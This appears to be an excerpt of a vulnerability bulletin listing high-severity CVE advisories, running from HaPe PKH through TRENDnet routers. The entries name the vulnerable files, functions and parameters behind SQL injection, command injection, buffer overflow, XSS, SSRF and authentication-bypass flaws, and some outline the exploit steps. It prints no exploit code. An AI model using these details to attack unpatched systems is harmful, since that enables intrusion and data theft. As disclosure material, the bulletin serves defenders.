| Sitejo--HaPe PKH | HaPe PKH 1.1 contains multiple SQL injection vulnerabilities in admin/media.php that allow attackers to manipulate database queries by injecting SQL code through the 'id' parameter. An unauthenticated attacker can exploit the desa module (module=desa&act=hapus), while authenticated users can exploit the pengurus, fasilitas, and kelompok modules (for example act=print, act=editpengurus, act=editfasilitas, and act=editkelompok). Successful exploitation allows extraction of sensitive database information including the current user, database name, and DBMS version. | 2026-05-29 | 8.2 | CVE-2018-25386 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an arbitrary file upload vulnerability that allows authenticated attackers to upload malicious files by bypassing file type validation. Attackers can upload PHP files through multiple endpoints including aksi_foto.php, aksi_user.php, and aksi_kecamatan.php to execute arbitrary code on the server. | 2026-05-29 | 8.8 | CVE-2018-25388 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'nama_kelompok' POST parameter sent to lap-anggota-kelompok-pdf.php. Attackers can send a crafted request with a time-based blind payload to infer and extract sensitive database information. | 2026-05-29 | 8.2 | CVE-2018-25389 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'desa' POST parameter sent to lap-peserta-perdesa-pdf.php. Attackers can send a crafted request with a time-based blind payload to infer and extract sensitive database information. | 2026-05-29 | 8.2 | CVE-2018-25390 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 fails to enforce authorization on its record deletion endpoints, allowing unauthenticated attackers to delete arbitrary records by sending a crafted request that specifies the target record's id. The admin/modul/mod_pengurus/aksi_pengurus.php (module=pengurus&act=hapus) and admin/modul/mod_update/aksi_update.php (module=update&act=hapus) endpoints process deletions without verifying the requester's privileges, enabling removal of pengurus (administrator) and update records. | 2026-05-29 | 7.5 | CVE-2018-25391 |
| smub--WPCode Insert Headers and Footers + Custom Code Snippets WordPress Code Manager | The WPCode - Insert Headers and Footers + Custom Code Snippets - WordPress Code Manager plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.3.5. This is due to the 'wpcode' custom post type being registered without a custom capability_type or capability restrictions in the wpcode_register_post_type() function, allowing WordPress core to fall back to standard post capabilities for all creation paths including XML-RPC. This makes it possible for authenticated attackers, with author-level access and above, to create and publish executable PHP snippet posts via XML-RPC wp.newPost, which are then executed server-side via eval() in the run_eval() function when the snippet is rendered through the [wpcode] shortcode. | 2026-05-27 | 8.8 | CVE-2026-8832 |
| SocuSoft--3GP Photo Slideshow | Socusoft 3GP Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft malicious input in the Registration Name and Registration Key fields to overwrite the SEH chain and execute shellcode for reverse shell access. | 2026-05-25 | 8.4 | CVE-2018-25376 |
| SocuSoft--DVD Photo Slideshow Professional | SocuSoft DVD Photo Slideshow Professional 8.07 contains a stack-based buffer overflow vulnerability in the registration name field that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious text file with carefully constructed payload containing junk bytes, SEH chain overwrite, and shellcode, then paste the contents into the Registration Name field via Help > Register to trigger code execution. | 2026-05-25 | 8.4 | CVE-2018-25373 |
| SocuSoft--Flash Slideshow Maker Professional | Flash Slideshow Maker Professional 5.20 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by exploiting structured exception handling. Attackers can craft a malicious payload and paste it into the Name and Code fields of the Help > Register dialog to trigger a reverse shell with system privileges. | 2026-05-25 | 8.4 | CVE-2018-25377 |
| SocuSoft--iPod Photo Slideshow | SocuSoft iPod Photo Slideshow 8.05 contains a buffer overflow vulnerability in the registration dialog that allows local attackers to execute arbitrary code by overwriting the structured exception handler. Attackers can craft malicious input in the Registration Name and Registration Key fields to trigger a stack-based buffer overflow and execute a reverse shell payload. | 2026-05-25 | 8.4 | CVE-2018-25375 |
| Softneta--MedDream PACS Server Premium | Softneta MedDream PACS Server Premium 6.7.1.1 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the path parameter. Attackers can send requests to nocache.php with encoded backslash sequences to traverse directories and access sensitive files including system configuration and password files. | 2026-05-25 | 7.5 | CVE-2018-25374 |
| solana-foundation--anchor | Anchor is a framework providing several convenient developer tools for writing Solana programs. From 1.0.0 to before 1.0.2, a logic error causes Anchor programs to accept any program id when requiring the system program id, causing false assumptions that result in potential arbitrary CPI in programs that invoke system program instructions. In the TryFrom<&'a AccountInfo<'a>> implementation for Program<'a, T>, the id of T is compared with Pubkey::default() to check whether Anchor should allow any executable account or a specific account, because when no T is supplied, T defaults to (), which implements Id::id() by returning Pubkey::default(). This results in T = () and T = System (which has Pubkey::default() as its id) having the same behavior: both allow any executable account. Programs built with Anchor assume that the Anchor runtime verifies that passed-in programs of type Program<'a, System> are in fact the system program. This false assumption can lead to arbitrary CPI or payment bypassing when programs make CPI calls to the system program using the passed-in system program, because the attacker can pass in any program instead of the system program. This vulnerability is fixed in 1.0.2. | 2026-05-27 | 8.2 | CVE-2026-45137 |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. This impacts an unknown function of the file /classes/Users.php?f=delete. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-31 | 7.3 | CVE-2026-10184 |
| SourceCodester--Hospitals Patient Records Management System | A weakness has been identified in SourceCodester Hospitals Patient Records Management System 1.0. Affected is an unknown function of the file /classes/Users.php?f=save. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-31 | 7.3 | CVE-2026-10185 |
| SourceCodester--Simple POS and Inventory System | A vulnerability was found in SourceCodester Simple POS and Inventory System 1.0. The impacted element is an unknown function of the file /user/search.php. Performing a manipulation of the argument Name results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-25 | 7.3 | CVE-2026-9447 |
| spatie--laravel-medialibrary | Spatie Laravel Media Library before version 11.23.0 contains a file upload restriction bypass in FileAdder::defaultSanitizer(). The sanitizer checks only the final filename suffix, allowing double-extension filenames such as shell.php.jpg to bypass the blocklist, with pathinfo() preserving inner .php stems in saved filenames. The blocklist also omits executable extensions including .php6, .shtml, and .htaccess. The double-extension bypass requires a legacy Apache AddHandler configuration to achieve PHP execution; the incomplete blocklist bypass does not. | 2026-05-29 | 8.8 | CVE-2026-48557 |
| spatie--laravel-medialibrary | Spatie Laravel Media Library before version 11.23.0 contains a server-side request forgery vulnerability that allows remote attackers to cause the server to issue arbitrary outbound HTTP requests by passing user-controlled URLs to the addMediaFromUrl() method in InteractsWithMedia.php. | 2026-05-29 | 7.4 | CVE-2026-48555 |
| spider312--MOGG web simulator Script | MOGG web simulator Script contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL commands by injecting malicious code through the id parameter. Attackers can send GET requests to play.php with crafted SQL payloads in the id parameter to extract sensitive database information including usernames and other data. | 2026-05-30 | 8.2 | CVE-2018-25422 |
| Splinterware--Splinterware System Scheduler Pro | Splinterware System Scheduler Pro 5.12 contains an insecure file permissions vulnerability that allows low-privilege users to escalate privileges by modifying service executable files. Attackers can rename the WService.exe file in the installation directory and replace it with a malicious executable that executes with LocalSystem privileges when the service is triggered. | 2026-05-25 | 8.4 | CVE-2018-25359 |
| spring-ai-community--mcp-security | mcp-security provides Security and Authorization support for Model Context Protocol in Spring AI. Prior to 0.1.9, the mcp-security framework fails to implement the mandatory SSRF mitigations outlined in the Model Context Protocol (MCP) security specifications. Specifically, it processes untrusted URLs for OAuth-related discovery and metadata without verifying whether the targets are malicious or internal to the network. This only affects installations with Dynamic Client Registration (DCR) enabled. This vulnerability is fixed in 0.1.9. | 2026-05-29 | 7.2 | CVE-2026-45609 |
| StoreApps--Smart Manager | Incorrect Privilege Assignment vulnerability in StoreApps Smart Manager allows Privilege Escalation. This issue affects Smart Manager: from n/a through 8.85.0. | 2026-05-25 | 8.8 | CVE-2026-45216 |
| Studio-42--elFinder | elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.68, an authenticated SQL injection vulnerability in the elFinder MySQL volume driver (elFinderVolumeMySQL) allows any logged-in user, including users with read-only access to the affected volume, to inject SQL through a crafted target file hash. Successful exploitation can lead to unauthorized data disclosure and denial of service. This vulnerability only affects installations configured to use the MySQL volume driver. This vulnerability is fixed in 2.1.68. | 2026-05-27 | 8.8 | CVE-2026-44521 |
| Stylemix--MasterStudy LMS | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stylemix MasterStudy LMS masterstudy-lms-learning-management-system allows Blind SQL Injection. This issue affects MasterStudy LMS: from n/a through <= 3.7.29. | 2026-05-27 | 8.5 | CVE-2026-42730 |
| Synology--Active Backup for Business | A vulnerability in Active Backup for Business allows unauthorized remote attackers to read arbitrary files. | 2026-05-27 | 8.6 | CVE-2025-30028 |
| Synology--BeeDrive for desktop | Uncontrolled search path element vulnerability in OpenSSL DLL component in Synology BeeDrive for desktop before 1.3.2-13814 allows local users to execute arbitrary code via unspecified vectors. | 2026-05-27 | 7.8 | CVE-2023-52945 |
| Synology--BeeStation OS | Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in AdminCenter in Synology BeeStation OS before 1.3.2-65648 allows remote attackers to execute arbitrary code via unspecified vectors. | 2026-05-27 | 9.8 | CVE-2025-12686 |
| Synology--C2 Identity Edge Server | An Exposed Dangerous Method or Function vulnerability in Synology C2 Identity Edge Server package in DSM before 1.76.0-0307 allows remote attackers to obtain user credentials from the edge server. | 2026-05-27 | 7.5 | CVE-2025-14713 |
| Synology--DiskStation Manager (DSM) | Improper check for unusual or exceptional conditions vulnerability in SSO in Synology DiskStation Manager (DSM) before 7.2.2-72806-5 and 7.3.1-86003-1 (7.2.1-69057 is not affected) allows remote attackers to bypass authentication with prior knowledge of the distinguished name (DN). | 2026-05-27 | 8.1 | CVE-2025-13392 |
| tainacan--Tainacan | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in tainacan Tainacan tainacan allows Blind SQL Injection. This issue affects Tainacan: from n/a through <= 1.0.3. | 2026-05-27 | 9.3 | CVE-2026-42740 |
| Talagasoft--MaxOn ERP | MaxOn ERP Software 8.x-9.x contains an SQL injection vulnerability that allows authenticated users to execute arbitrary SQL queries through the nomor, user, and jenis parameters in the log_activity function. Attackers can send POST requests to /index.php/user/log_activity with malicious SQL code in these parameters to extract sensitive database information including version and database names. | 2026-05-29 | 7.1 | CVE-2018-25392 |
| Tanium--Connect | Tanium addressed an unauthorized code execution vulnerability in Connect. | 2026-05-27 | 8.8 | CVE-2026-9207 |
| Tanium--Connect | Tanium addressed an unauthorized code execution vulnerability in Connect. | 2026-05-27 | 8.8 | CVE-2026-9208 |
| Tenda--F1202 | A vulnerability has been found in Tenda F1202 1.2.0.20(408). Affected is the function fromPPTPUserSetting of the file /goform/PPTPUserSetting. Such manipulation of the argument delno leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 8.8 | CVE-2026-9428 |
| Tenda--F1202 | A vulnerability was found in Tenda F1202 1.2.0.20(408). Affected by this vulnerability is the function formWrlExtraSet of the file /goform/WrlExtraSet. Performing a manipulation of the argument delno results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-05-25 | 8.8 | CVE-2026-9429 |
| Tenda--F1202 | A vulnerability was determined in Tenda F1202 1.2.0.20(408). Affected by this issue is the function formGstDhcpSetSer of the file /goform/GstDhcpSetSerof. Executing a manipulation of the argument dips can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 8.8 | CVE-2026-9430 |
| Tenda--F1202 | A vulnerability was identified in Tenda F1202 1.2.0.20(408). This affects the function fromPptpUserAdd of the file /goform/PptpUserAdd. The manipulation of the argument opttype leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-05-25 | 8.8 | CVE-2026-9431 |
| Tenda--W12 | A flaw has been found in Tenda W12 3.0.0.7(4763). This affects the function cgistaKickOff of the file /bin/httpd. Executing a manipulation of the argument staMac can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. | 2026-05-31 | 8.8 | CVE-2026-10188 |
| Tenda--W12 | A vulnerability has been found in Tenda W12 3.0.0.7(4763). This vulnerability affects the function cgiSysTimeInfoSet of the file /bin/httpd. The manipulation of the argument sec leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 8.8 | CVE-2026-10189 |
| Tenda--W12 | A vulnerability was determined in Tenda W12 3.0.0.7(4763). Impacted is the function cgiWifiMacFilterSet of the file /bin/httpd. This manipulation of the argument wifiMacFilterSet.macList.mac causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-31 | 8.8 | CVE-2026-10191 |
| Tenda--W12 | A vulnerability was identified in Tenda W12 3.0.0.7(4763). The affected element is the function set_local_time_0 of the file /bin/httpd. Such manipulation of the argument Time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-05-31 | 8.8 | CVE-2026-10192 |
| Themeisle--Disable Comments for Any Post Types (Remove comments) | Authentication Bypass Using an Alternate Path or Channel vulnerability in Themeisle Disable Comments for Any Post Types (Remove comments) comments-plus allows Password Recovery Exploitation. This issue affects Disable Comments for Any Post Types (Remove comments): from n/a through <= 1.3.0. | 2026-05-27 | 7.1 | CVE-2026-42749 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an insecure direct object reference vulnerability in the admin API user password endpoint that allows authenticated administrators to change any user's password without authorization verification. An attacker with low-privilege admin credentials can escalate to SuperAdmin by modifying the userId parameter in the overwrite-password API request. | 2026-05-28 | 8.8 | CVE-2026-35671 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in the password reset endpoint that allows unauthenticated attackers to reset any user account password without token verification or email confirmation. Attackers can enumerate valid usernames, obtain plaintext passwords via email, and achieve complete account takeover including administrative access. | 2026-05-28 | 8.2 | CVE-2026-35675 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an unauthenticated password reset vulnerability in the user password update API endpoint that allows attackers to change account passwords without token validation. Attackers can enumerate valid username and email pairs and force immediate password changes by sending PUT requests to the /api/index.php/user/password/update endpoint, causing account disruption and invalidating legitimate user credentials. | 2026-05-28 | 8.2 | CVE-2026-35676 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in API v4.0 where the default empty api.apiClientToken allows unauthenticated users to create and modify FAQ entries. Attackers can send an empty x-pmf-token header to bypass token validation and inject malicious content via POST endpoints /api/v4.0/faq/create, /api/v4.0/category, and /api/v4.0/question. | 2026-05-28 | 7.5 | CVE-2026-35672 |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was found in Tiandy Easy7 Integrated Management Platform 7.17.0. This vulnerability affects unknown code of the file /Easy7/apps/WebService/GetDBDataEx.jsp. Performing a manipulation of the argument strTBName results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 7.3 | CVE-2026-9465 |
| Timo--Affiliate Super Assistent | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Timo Affiliate Super Assistent amazonsimpleadmin allows Stored XSS. This issue affects Affiliate Super Assistent: from n/a through <= 1.10.1. | 2026-05-27 | 7.1 | CVE-2026-42759 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability via unsanitized data-mce-* attributes (data-mce-href, data-mce-src, data-mce-style). This allows attackers to inject malicious values that override safe attributes during serialization, bypassing validation. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47759 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. From 6.8.0 to before 7.1.0, TinyMCE contains an XSS vulnerability caused by improper SVG namespace scope handling in the sanitizer. A crafted payload using nested elements can bypass attribute sanitization and execute arbitrary JavaScript. This vulnerability is fixed in 7.1.0. | 2026-05-28 | 8.7 | CVE-2026-47760 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability in the media plugin. Attackers can inject malicious scripts via crafted data-mce-* attributes, which are executed when content is rendered. Impacts users of TinyMCE with the media plugin enabled. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47761 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability via forged mce:protected comments. This allows attackers to bypass sanitization and inject scripts that execute when content is restored. Impacts users who utilize the protect option. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47762 |
| Totolink--A8000RU | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enable results in os command injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9408 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setWiFiAdvancedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument bgProtection results in os command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9432 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setMacFilterRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument enable causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9433 |
| Totolink--A8000RU | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setWiFiWpsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument wscDisabled leads to os command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 9.8 | CVE-2026-9434 |
| Totolink--A8000RU | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setQosCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9435 |
| Totolink--A8000RU | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setL2tpServerCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-25 | 9.8 | CVE-2026-9436 |
| Totolink--A8000RU | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setOpenVpnCertGenerationCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument servername can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used. | 2026-05-25 | 9.8 | CVE-2026-9454 |
| Totolink--A8000RU | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function UploadOpenVpnCert of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument FileName leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9455 |
| Totolink--A8000RU | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setOpenVpnCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enabled results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-25 | 9.8 | CVE-2026-9456 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 9.8 | CVE-2026-9457 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument enabled leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-25 | 9.8 | CVE-2026-9458 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument Comment causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 9.8 | CVE-2026-9475 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-05-25 | 9.8 | CVE-2026-9476 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setAccessDeviceCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument mac results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9477 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setParentalRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9478 |
| Totolink--N300RH | A vulnerability was detected in Totolink N300RH 6.1c.1353_B20190305. Affected by this issue is the function setWiFiBasicConfig of the file wireless.so of the component Web Management Interface. Performing a manipulation of the argument KeyStr results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-31 | 9.8 | CVE-2026-10187 |
| Totolink--N300RH | A vulnerability has been found in Totolink N300RH 6.1c.1353_B20190305. Affected is the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 9.8 | CVE-2026-9543 |
| TRENDnet--TEW-432BRP | A vulnerability was determined in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSetRoute of the file /goform/formSetRoute. This manipulation of the argument ip/mask/gateway causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10062 |
| TRENDnet--TEW-432BRP | A vulnerability was identified in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formWPS of the file /goform/formWPS. Such manipulation of the argument peerPin leads to stack-based buffer overflow. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10063 |
| TRENDnet--TEW-432BRP | A security vulnerability has been detected in TRENDnet TEW-432BRP 3.10B20. Impacted is the function formSetMACFilter of the file /goform/formSetMACFilter. The manipulation of the argument filter_name leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10119 |
| TRENDnet--TEW-432BRP | A vulnerability was detected in TRENDnet TEW-432BRP 3.10B20. The affected element is the function formSetFirewallRule of the file /goform/formSetFirewallRule. The manipulation of the argument firewall_name results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10120 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. The impacted element is the function formSetUrlFilter of the file /goform/formSetUrlFilter. This manipulation of the argument keyword_list/keyword causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10121 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetProtocolFilter of the file /goform/formSetProtocolFilter. Such manipulation of the argument protocol_name leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10122 |
| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetDomainFilter of the file /goform/formSetDomainFilter. Performing a manipulation of the argument blocked_domain/permitted_domain/blocked_domain_list/permitted_domain_list results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10123 |
| TRENDnet--TEW-432BRP | A security flaw has been discovered in TRENDnet TEW-432BRP 3.10B20. Affected is the function formPortFw of the file /goform/formPortFw. The manipulation of the argument server_name results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10158 |
| TRENDnet--TEW-432BRP | A weakness has been identified in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSysLog of the file /goform/formSysLog. This manipulation of the argument current_page causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10159 |
| TRENDnet--TEW-432BRP | A security vulnerability has been detected in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formSetEnableWizard of the file /goform/formSetEnableWizard. Such manipulation of the argument start_wizard leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10160 |
| TRENDnet--TEW-432BRP | A vulnerability was detected in TRENDnet TEW-432BRP 3.10B20. This affects the function formResetStatistic of the file /goform/formResetStatistic. Performing a manipulation of the argument status_statistic results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10161 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. This vulnerability affects the function formSetPassword of the file /goform/formSetPassword. Executing a manipulation of the argument webpage can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10162 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. This issue affects the function formSetWlanEncrypt of the file /goform/formSetWlanEncrypt. This manipulation of the argument webpage causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10179 |
